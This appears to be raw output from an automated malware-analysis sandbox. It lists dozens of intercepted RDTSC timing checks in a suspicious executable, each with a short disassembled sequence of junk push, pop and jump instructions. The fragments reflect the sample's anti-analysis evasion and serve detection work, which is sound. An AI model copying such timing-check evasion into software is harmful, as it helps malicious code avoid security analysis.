Source: C:\Users\user\Desktop\jklg6EIhyR.exeRDTSC instruction interceptor: First address: 10A629F second address: 10A62A7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 push edi 0x00000007 pop edi 0x00000008 rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exeRDTSC instruction interceptor: First address: 10A63D3 second address: 10A63D9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exeRDTSC instruction interceptor: First address: 10A63D9 second address: 10A6401 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jmp 00007F78B9095CF9h 0x0000000c jg 00007F78B9095CE6h 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exeRDTSC instruction interceptor: First address: 10A655E second address: 10A6577 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F78B909B105h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exeRDTSC instruction interceptor: First address: 10A6577 second address: 10A6587 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnc 00007F78B9095CE6h 0x0000000a ja 00007F78B9095CE6h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exeRDTSC instruction interceptor: First address: 10A6587 second address: 10A658B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exeRDTSC instruction interceptor: First address: 10A66ED second address: 10A6707 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F78B9095CF2h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exeRDTSC instruction interceptor: First address: 10A6707 second address: 10A670B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exeRDTSC instruction interceptor: First address: 10A670B second address: 10A6724 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F78B9095CEFh 0x00000007 jg 00007F78B9095CE6h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exeRDTSC instruction interceptor: First address: 10AD94D second address: 10AD98C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F78B909B0FEh 0x00000009 jmp 00007F78B909B106h 0x0000000e jmp 00007F78B909B106h 0x00000013 popad 0x00000014 rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exeRDTSC instruction interceptor: First address: 10AD98C second address: 10AD9AB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F78B9095CF5h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exeRDTSC instruction interceptor: First address: 10AD9AB second address: 10AD9B9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F78B909B0FAh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exeRDTSC instruction interceptor: First address: 10AD9B9 second address: 10AD9D7 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F78B9095CF8h 0x0000000b rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exeRDTSC instruction interceptor: First address: 10AD9D7 second address: 10AD9DC instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exeRDTSC instruction interceptor: First address: 10AC45E second address: 10AC462 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exeRDTSC instruction interceptor: First address: 10AC462 second address: 10AC471 instructions: 0x00000000 rdtsc 0x00000002 jg 00007F78B909B0F6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b pushad 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exeRDTSC instruction interceptor: First address: 10AC724 second address: 10AC75D instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F78B9095CECh 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d jmp 00007F78B9095CF4h 0x00000012 jmp 00007F78B9095CF1h 0x00000017 popad 0x00000018 rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exeRDTSC instruction interceptor: First address: 10AC75D second address: 10AC764 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exeRDTSC instruction interceptor: First address: 10AC939 second address: 10AC945 instructions: 0x00000000 rdtsc 0x00000002 jo 00007F78B9095CEEh 0x00000008 push ecx 0x00000009 pop ecx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exeRDTSC instruction interceptor: First address: 10AC945 second address: 10AC94D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 pushad 0x00000007 popad 0x00000008 rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exeRDTSC instruction interceptor: First address: 10ACAAE second address: 10ACAD0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F78B9095CEFh 0x00000009 pop ebx 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F78B9095CECh 0x00000011 rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exeRDTSC instruction interceptor: First address: 10AD5AE second address: 10AD5CF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnc 00007F78B909B0F6h 0x0000000a pop ecx 0x0000000b jmp 00007F78B909B106h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exeRDTSC instruction interceptor: First address: 10AD5CF second address: 10AD5EC instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F78B9095CEEh 0x00000008 push esi 0x00000009 pushad 0x0000000a popad 0x0000000b pop esi 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push esi 0x0000000f push eax 0x00000010 push edx 0x00000011 push ebx 0x00000012 pop ebx 0x00000013 push ebx 0x00000014 pop ebx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exeRDTSC instruction interceptor: First address: 10B09BA second address: 10B09C2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push edx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exeRDTSC instruction interceptor: First address: 10B09C2 second address: 10B09E0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007F78B9095CF5h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exeRDTSC instruction interceptor: First address: 10B09E0 second address: 10B09E4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exeRDTSC instruction interceptor: First address: 10B02AE second address: 10B02C1 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 push edi 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jmp 00007F78B9095CEBh 0x0000000d rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exeRDTSC instruction interceptor: First address: 10B02C1 second address: 10B02DA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push ecx 0x00000006 pop ecx 0x00000007 jmp 00007F78B909B0FCh 0x0000000c pushad 0x0000000d popad 0x0000000e popad 0x0000000f push ebx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exeRDTSC instruction interceptor: First address: 10B65AE second address: 10B65C4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F78B9095CF1h 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exeRDTSC instruction interceptor: First address: 10B65C4 second address: 10B65E9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F78B909B107h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d jp 00007F78B909B0F6h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exeRDTSC instruction interceptor: First address: 10B65E9 second address: 10B6601 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F78B9095CF2h 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exeRDTSC instruction interceptor: First address: 10B6601 second address: 10B6608 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edi 0x00000004 pop edi 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exeRDTSC instruction interceptor: First address: 10B6608 second address: 10B6621 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F78B9095CECh 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c jnc 00007F78B9095CE6h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exeRDTSC instruction interceptor: First address: 10B677F second address: 10B67AD instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F78B909B103h 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F78B909B0FEh 0x00000013 push edi 0x00000014 push edi 0x00000015 pop edi 0x00000016 pop edi 0x00000017 rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exeRDTSC instruction interceptor: First address: 10B6A52 second address: 10B6A56 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exeRDTSC instruction interceptor: First address: 10B6D2C second address: 10B6D32 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exeRDTSC instruction interceptor: First address: 10B7264 second address: 10B7286 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ecx 0x00000004 pop ecx 0x00000005 push edi 0x00000006 pop edi 0x00000007 jmp 00007F78B9095CF9h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exeRDTSC instruction interceptor: First address: 10B7B69 second address: 10B7B6D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exeRDTSC instruction interceptor: First address: 10B7B6D second address: 10B7B89 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F78B9095CE6h 0x00000008 push esi 0x00000009 pop esi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d push esi 0x0000000e pop esi 0x0000000f jmp 00007F78B9095CEBh 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exeRDTSC instruction interceptor: First address: 10B7B89 second address: 10B7B8E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exeRDTSC instruction interceptor: First address: 10B814A second address: 10B8154 instructions: 0x00000000 rdtsc 0x00000002 jp 00007F78B9095CE6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exeRDTSC instruction interceptor: First address: 10C2382 second address: 10C2386 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exeRDTSC instruction interceptor: First address: 10C24EA second address: 10C24F5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exeRDTSC instruction interceptor: First address: 10C24F5 second address: 10C2500 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 je 00007F78B909B0F6h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exeRDTSC instruction interceptor: First address: 10C2638 second address: 10C2642 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 pushad 0x00000006 push esi 0x00000007 pop esi 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exeRDTSC instruction interceptor: First address: 10C2748 second address: 10C275C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F78B909B0FCh 0x00000009 pop edi 0x0000000a push ecx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exeRDTSC instruction interceptor: First address: 10C275C second address: 10C2781 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 jmp 00007F78B9095CF5h 0x0000000a pushad 0x0000000b pushad 0x0000000c popad 0x0000000d jnl 00007F78B9095CE6h 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exeRDTSC instruction interceptor: First address: 10C2B4A second address: 10C2B67 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jc 00007F78B909B0F6h 0x0000000a popad 0x0000000b je 00007F78B909B102h 0x00000011 jbe 00007F78B909B0F6h 0x00000017 jns 00007F78B909B0F6h 0x0000001d rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exeRDTSC instruction interceptor: First address: 10CB000 second address: 10CB004 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exeRDTSC instruction interceptor: First address: 10C91CA second address: 10C91DF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F78B909B0FFh 0x0000000b rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exeRDTSC instruction interceptor: First address: 10C9746 second address: 10C974A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exeRDTSC instruction interceptor: First address: 10C974A second address: 10C9755 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ebx 0x00000007 push edx 0x00000008 pop edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exeRDTSC instruction interceptor: First address: 10C9B5A second address: 10C9B5E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exeRDTSC instruction interceptor: First address: 10C9B5E second address: 10C9B73 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jc 00007F78B909B0FCh 0x0000000c jg 00007F78B909B0F6h 0x00000012 push eax 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exeRDTSC instruction interceptor: First address: 10C9B73 second address: 10C9B79 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exeRDTSC instruction interceptor: First address: 10C9CBE second address: 10C9CC2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exeRDTSC instruction interceptor: First address: 10C9F7F second address: 10C9F8F instructions: 0x00000000 rdtsc 0x00000002 je 00007F78B9095CE6h 0x00000008 js 00007F78B9095CE6h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exeRDTSC instruction interceptor: First address: 10C9F8F second address: 10C9FAF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F78B909B106h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a push ecx 0x0000000b push edx 0x0000000c pop edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exeRDTSC instruction interceptor: First address: 10CA6E0 second address: 10CA6F0 instructions: 0x00000000 rdtsc 0x00000002 js 00007F78B9095CE6h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push ebx 0x0000000d pushad 0x0000000e popad 0x0000000f pop ebx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exeRDTSC instruction interceptor: First address: 10E5C8B second address: 10E5C8F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exeRDTSC instruction interceptor: First address: 10E5C8F second address: 10E5C93 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exeRDTSC instruction interceptor: First address: 10E5C93 second address: 10E5CA1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 je 00007F78B909B0FCh 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exeRDTSC instruction interceptor: First address: 10E5704 second address: 10E5710 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pushad 0x00000008 pushad 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exeRDTSC instruction interceptor: First address: 10EA750 second address: 10EA759 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exeRDTSC instruction interceptor: First address: 10EA759 second address: 10EA761 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exeRDTSC instruction interceptor: First address: 10EBDA8 second address: 10EBDAC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exeRDTSC instruction interceptor: First address: 10EBDAC second address: 10EBDDA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jc 00007F78B9095CFCh 0x0000000c push edi 0x0000000d pop edi 0x0000000e jmp 00007F78B9095CF4h 0x00000013 push ebx 0x00000014 jc 00007F78B9095CE6h 0x0000001a pop ebx 0x0000001b push eax 0x0000001c push edx 0x0000001d pushad 0x0000001e popad 0x0000001f rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exeRDTSC instruction interceptor: First address: 10EBDDA second address: 10EBDEB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F78B909B0FDh 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exeRDTSC instruction interceptor: First address: 10F1EC4 second address: 10F1EE2 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 jmp 00007F78B9095CF9h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exeRDTSC instruction interceptor: First address: 10F1EE2 second address: 10F1EF2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a jo 00007F78B909B0F6h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exeRDTSC instruction interceptor: First address: 10FAEFD second address: 10FAF0F instructions: 0x00000000 rdtsc 0x00000002 je 00007F78B9095CE6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jng 00007F78B9095CFDh 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exeRDTSC instruction interceptor: First address: 11019C6 second address: 11019CA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exeRDTSC instruction interceptor: First address: 11019CA second address: 11019E3 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F78B9095CF3h 0x0000000b rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exeRDTSC instruction interceptor: First address: 1100351 second address: 110035E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jnp 00007F78B909B0F6h 0x00000009 push edi 0x0000000a pop edi 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exeRDTSC instruction interceptor: First address: 110035E second address: 1100366 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exeRDTSC instruction interceptor: First address: 1100366 second address: 110036C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exeRDTSC instruction interceptor: First address: 11004B4 second address: 11004BB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exeRDTSC instruction interceptor: First address: 1100980 second address: 1100985 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exeRDTSC instruction interceptor: First address: 1100AF3 second address: 1100B0A instructions: 0x00000000 rdtsc 0x00000002 jg 00007F78B9095CEEh 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exeRDTSC instruction interceptor: First address: 1100B0A second address: 1100B0E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exeRDTSC instruction interceptor: First address: 1100B0E second address: 1100B2F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F78B9095CF2h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push edx 0x0000000a jne 00007F78B9095CE6h 0x00000010 pop edx 0x00000011 push edi 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exeRDTSC instruction interceptor: First address: 1100C94 second address: 1100C9A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exeRDTSC instruction interceptor: First address: 1100C9A second address: 1100CA4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007F78B9095CE6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exeRDTSC instruction interceptor: First address: 1100CA4 second address: 1100CB5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F78B909B0FDh 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exeRDTSC instruction interceptor: First address: 1100CB5 second address: 1100CEA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F78B9095CEFh 0x0000000b pop edx 0x0000000c pop eax 0x0000000d pushad 0x0000000e jmp 00007F78B9095CEEh 0x00000013 pushad 0x00000014 push eax 0x00000015 pop eax 0x00000016 jmp 00007F78B9095CEAh 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exeRDTSC instruction interceptor: First address: 1102FD0 second address: 1102FD5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exeRDTSC instruction interceptor: First address: 1109041 second address: 110905E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F78B9095CEDh 0x00000007 jl 00007F78B9095CF2h 0x0000000d jnc 00007F78B9095CE6h 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exeRDTSC instruction interceptor: First address: 110905E second address: 1109078 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jg 00007F78B909B102h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exeRDTSC instruction interceptor: First address: 113FC41 second address: 113FC5B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007F78B9095CF5h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exeRDTSC instruction interceptor: First address: 113FC5B second address: 113FC60 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exeRDTSC instruction interceptor: First address: 113FC60 second address: 113FC69 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exeRDTSC instruction interceptor: First address: 114975C second address: 11497A4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 js 00007F78B909B10Fh 0x0000000b push edi 0x0000000c pop edi 0x0000000d jmp 00007F78B909B107h 0x00000012 jmp 00007F78B909B108h 0x00000017 popad 0x00000018 push edi 0x00000019 push eax 0x0000001a push edx 0x0000001b jl 00007F78B909B0F6h 0x00000021 push eax 0x00000022 push edx 0x00000023 rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exeRDTSC instruction interceptor: First address: 11497A4 second address: 11497A8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exeRDTSC instruction interceptor: First address: 11495EE second address: 11495FD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 jmp 00007F78B909B0FAh 0x0000000a rdtsc
